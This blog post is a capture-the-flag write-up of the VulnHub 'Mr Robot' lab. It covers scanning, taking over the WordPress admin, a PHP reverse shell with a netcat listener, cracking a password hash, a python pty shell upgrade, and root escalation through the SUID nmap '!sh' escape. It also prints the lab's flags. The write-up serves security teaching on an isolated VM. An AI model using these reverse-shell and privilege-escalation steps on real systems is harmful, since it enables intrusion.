Monday, 13 March 2017

VulnHub Write Up - Mr Robot


Vulnerable Machine:


Method:

  • Scanned network to discover target
  • Scanned ports and services on target
  • Scanned the web application for vulnerabilities and information
  • Scanned for specific WordPress vulnerabilities
  • Exploit WordPress by uploading a php-reverse-shell
  • Use a misconfigured SUID Bit to escalate privileges

Tools:



Useful links:




Write up:

The first step to any penetration testing, whether it is network or web based, is Intelligence Gathering. After we had our attacking machine and our Mr Robot virtual machine both on the host only network adapter, our first step was to scan our network for our target. 
I ran an nmap scan with -n flag to skip DNS resolution as we are on host only (the box is not connected to the internet, it is generally bad practice to have a vulnerable machine internet facing for obvious reasons), and with an -sn flag for host discovery and used the * wildcard to scan all IP's from 192.168.56.0-255:

root@Hazana:~# nmap -n -sn 192.168.56.*
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:30 GMT
Nmap scan report for 192.168.56.103
Host is up (0.00013s latency).
MAC Address: 08:00:27:A2:13:1F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00016s latency).
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.98 seconds

As my machine is .103, and I know .100 is the host-only ethernet adapter, then we have our target; .102
Next was to scan the target for ports and services.
The -A flag will probe for open ports, services and OS fingerprinting:

root@Hazana:~# nmap -A -n 192.168.56.102
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 15:31 GMT
Nmap scan report for 192.168.56.102
Host is up (0.00030s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:CF:FB:C2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2
Network Distance: 1 hop
TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.56.102

(Unfortunately the actual webpages were having problems displaying for me, but from checking the source code and from what I've read there is some fun stuff to explore.)

We can see it is running a web server, I like to use a tool called Nikto to scan for vulnerabilities or if anything is misconfigured:



root@Hazana:~# nikto -h 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2017-03-12 15:44:31 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.56.102/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-12 15:47:08 (GMT0) (157 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We can gather some useful things from the Nikto scan:

- The server is leaking ETags, to do with CVE-2003-1418, meaning the server is leaking sesnitive information of inode numbers and PIDs
- We can bruteforce the server for file names due to mod_negoiation being enabled with MultiViews
- Found an /admin, /admin/index.html (admin login page, we will remember this if we find any credentials) and 2 /wp-login.php pages, also useful if we find any credentials
- We also know the server is running WordPress, which often contains vulnerabilities

I decided to run a Wpscan, a WordPress security scanner, it gave us a lot of XSS issues but that wasn’t going to be useful for us:

root@Hazana:~/MrRobot# wpscan --url 192.168.56.102
[+] URL: http://192.168.56.102/
[+] Started: Sun Mar 12 16:18:09 2017
[+] robots.txt available under: 'http://192.168.56.102/robots.txt'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.56.102/xmlrpc.php

However from this scan we can see /robots.txt is here. /robots.txt is essentially a way of telling robots not to crawl these webpages so they wont display on google search for example.

After browsing to /robots.txt we can see the dissallowed entries:
User-agent: *
fsocity.dic
key-1-of-3.txt
After browsing to 192.168.56.102/key-1-of-3.txt we get our first key!

Key 1:
073403c8a58a1f80d943455fb30724b9

I then decided to check /fsocity.dic, where we got a download:



I opened it up with gedit and it seems to be a word list:




Using wc -l file in the terminal we can count the number of lines:
root@Hazana:~/MrRobot# wc -l fsocity.dic
858160 fsocity.dic
So a big wordlist!
I Decided to go back and check on what Nikto had found, I browsed to /admin/index.html and checked the source code:




/readme.html:






/wp-links-opml.php revealed the WordPress version, this may come in useful later:




/liscence.txt shows us: 
"what do you just pull code from Rapid9 or some s@#% since when you become a script kitty?"
Which if I recall is a quote from Elliot in the show:





I almost missed it but if you scroll down on the /liscence.txt page you can see what looks like a base64 encoded string right at the bottom. 
So, I decoded it in my browser using the HackBar extension (check it out, I highly recommend it):





It decoded to elliot:ER28-0652. Seems like credentials, we shall go back and try these creds in /wp-admin/ which we made note of earlier:




Success!





Looking around I noticed under appearance > editor, we can directly edit the php code! Lets try and get a reverse php shell!
Pentestmonkey have already written a great php reverse shell here
or easily download in a terminal with:

git clone github.com/pentestmonkey/php-reverse-shell

 Now we can edit the script to put in our IP address:




Then copy and paste it into the WP editor:




Next we need to set up a netcat listener to listen for the connection, the 1234 is the port number which was defined in the script:

root@Hazana:~ # nc -nvlp 1234
listening on [any] 1234 ...

Then browse to the url where we edited the php, which will make the web server execute our script:
http://192.168.56.102/wp-content/themes/twentyfifteen/404.php

Bingo! A reverse shell!

root@Hazana:~ #
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.102] 35697
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
16:56:26 up  1:35,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off

Now we can navigate in our PHP reverse shell:

$
$ cd home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Now we have an md5 hash! We could crack it ourselves, but that might take a while so lets submit it on crackstation to see if they already have the hash in their database.



Great! We now have a password and a username!

robot: abcdefghijklmnopqrstuvwxyz

Now we need to be able to login with these credentials, however our PHP shell just won’t cut it, so we can upgrade our shell using a simple trick with python. Some extra reading in the difference between terminals, shells, tty and consoles can be found here.

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
(su can be thought of as switch user, so we can execute commands with the privileges of the robot user)

Now we are logged in as robot!

robot@linux:~$ ls
ls
key-2-of-3.txt    password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959


2nd key:
822c73956184f694993bede3eb39f959

Now let’s enumerate the internals of this host, I always check to see if we have nmap installed:

robot@linux:~$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>

So, we have nmap installed, however it is a much older version... Anyhow let’s scan ourselves using nmap -A localhost:

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-03-12 17:14 UTC
Interesting ports on localhost (127.0.0.1):
(The 1659 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsFTPd 3.0.2
80/tcp   open  http    Apache httpd
443/tcp  open  ssl     Nessus security scanner
3306/tcp open  mysql

So, we have ftp and mysql running, interesting!
The problem is we have no credentials to access them we could brute force hoping for weak credentials. But I decided to have a look around further to see if there were any clues:

robot@linux:/$ cd root
cd root
bash: cd: root: Permission denied

Hmm, perhaps some privilege escalation is in order.
There’s a reason it is constantly drilled into us to keep our software up to date, I decided to check if there were any problems with that old version of nmap.
I came across this article.
Essentially we can find all files that are owned by root with SUID permission bits (-perm -4000) and chuck any errors away to /dev/null:

robot@linux:/$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

We can see nmap is in there! It shouldn't have these permissions so let’s try and abuse them.
As this is an older nmap, we can start interactive mode with --interactive:

robot@linux:/$ nmap --interactive
nmap> !sh
!sh
(The !sh lets us escape to a shell with the privileges nmap has)

# cd root
cd root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4


Just like that we can abuse the permission in our nmap shell and read the final key!

Key 3:
04787ddef27c3dee1ee161b21670b4e4


Hope you enjoyed my first write up, any questions or improvements let me know, thanks!

No comments:

Post a Comment